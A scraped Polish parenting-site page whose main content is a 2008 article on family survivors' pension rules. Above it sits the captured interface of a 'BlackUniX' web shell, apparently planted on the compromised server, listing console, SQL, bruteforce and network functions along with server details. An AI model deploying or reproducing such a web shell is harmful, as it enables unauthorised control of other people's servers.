W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 07:12:22
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.153.90
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Co po śmierci...
30.04.2008.

Śmierć rodzica, poza oczywistą – psychiczną stratą, może wiązać się równocześnie z pogorszeniem statusu materialnego rodziny. Na szczęście po śmierci rodzica, dziecko nie jest zostawione samo sobie. Jeżeli rodzic był ubezpieczony - pracował, był emerytem lub rencistą, dzieci mają prawo do otrzymywania z Zakładu Ubezpieczeń Społecznych renty rodzinnej. Renta rodzinna służy zaspokajaniu potrzeb dzieci i niektórych osób będących na utrzymania zmarłego, w sytuacji, kiedy on sam już nie jest w stanie tego zrobić.

Jakie trzeba spełnić kryteria, aby ubiegać się o rentę.

Osoba umarła musiała być ubezpieczona, spełniać warunki do przyznania emerytury, czy renty. Miesiąc temu Trybunał Konstytucyjny wydał orzeczenie, z którego wynika, że prawa do renty rodzinnej nie mają rodziny osób, które zmarły po upływie 18 miesięcy od ostatniego ubezpieczenia.

Kto może ubiegać się o rentę rodzinną:

-dzieci: własne, przysposobione, także dzieci małżonka do 16 roku życia, lub do 25 roku życia jeśli się uczą. Renta rodzinna bez względu na wiek przysługuje dzieciom, które stały się całkowicie niezdolne do pracy przed ukończeniem 16 roku życia lub w trakcie nauki w szkole do ukończenia 25 roku życia.

Prawo do renty mają dzieci zarówno te, które uczą się w trybie: stacjonarnym jak wieczorowym, zaocznym i korespondencyjnym w:

- szkołach publicznych i niepublicznych o uprawnieniach szkół publicznych, szkołach wyższych państwowych i niepaństwowych działających na podstawie ustawy o szkolnictwie wyższym,

- szkołach i seminariach prowadzonych przez kościół katolicki,

- na kursach przysposobienia i doskonalenia zawodowego, prowadzonych w formach szkolnych lub pozaszkolnych trwających co najmniej 3 miesiące.

Nawet urlop dziekański bez względu na przyczynę nie eliminuje możliwości pobierania renty. Należy jednak pamiętać, że prawo do renty przysługuje tylko do 25 roku życia. Jedynym wyjątkiem jest sytuacja w której 25 latek jest na ostatnim roku studiów. Wtedy prawo do renty przedłuża się do zakończenia tego roku studiów.

Renta rodzinna przysługuje również dzieciom, które uczą się za granicą w szkołach podstawowych i wyższych oraz dzieciom, które za granicą uczą się języka obcego, na kursach trwających co najmniej 3 miesiące.

Również wnuki, rodzeństwo i inne dzieci przyjęte na wychowanie i utrzymanie przed osiągnięciem pełnoletności mają prawo do renty. Są tu jednak pewne dodatkowe kryteria, które muszą być spełnione łącznie:

- dzieci te zostały przyjęte na wychowanie co najmniej na rok przed śmiercią pracownika, emeryta lub rencisty, chyba że śmierć była następstwem wypadku,

-nie mają prawa do renty po rodzicach, rodzice nie mogą zapewnić im utrzymania lub gdy pracownik, emeryt lub rencista albo jego małżonek był ich opiekunem ustanowionym przez sąd.

Czyli mówiąc po ludzku, nie dostanie renty po dziadkach dziecko, które pomieszkuje u dziadków, a jego rodzice są w stanie je utrzymać.

Wysokość renty. Wysokość renty rodzinnej jest uzależniona od potencjalnej, lub otrzymywanej wysokości renty, którą otrzymywałby zmarły.

Renta rodzinna przysługuje wszystkim członkom rodziny, którzy mają prawo do renty po zmarłym. W razie konieczności jest dzielona w równych częściach pomiędzy uprawnionych.

- dla jednej osoby uprawnionej - 85% renty z tytułu całkowitej niezdolności do pracy, która przysługiwałoby zmarłemu,

- dla dwóch osób uprawnionych - 90% renty z tytułu całkowitej niezdolności do pracy, która przysługiwałoby zmarłemu,

- dla trzech i więcej osób uprawnionych - 95% renty z tytułu całkowitej niezdolności do pracy, która przysługiwałoby zmarłemu.

Sieroty zupełne mogą liczyć także na dodatek dla sierot zupełnych.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
20.06.2018.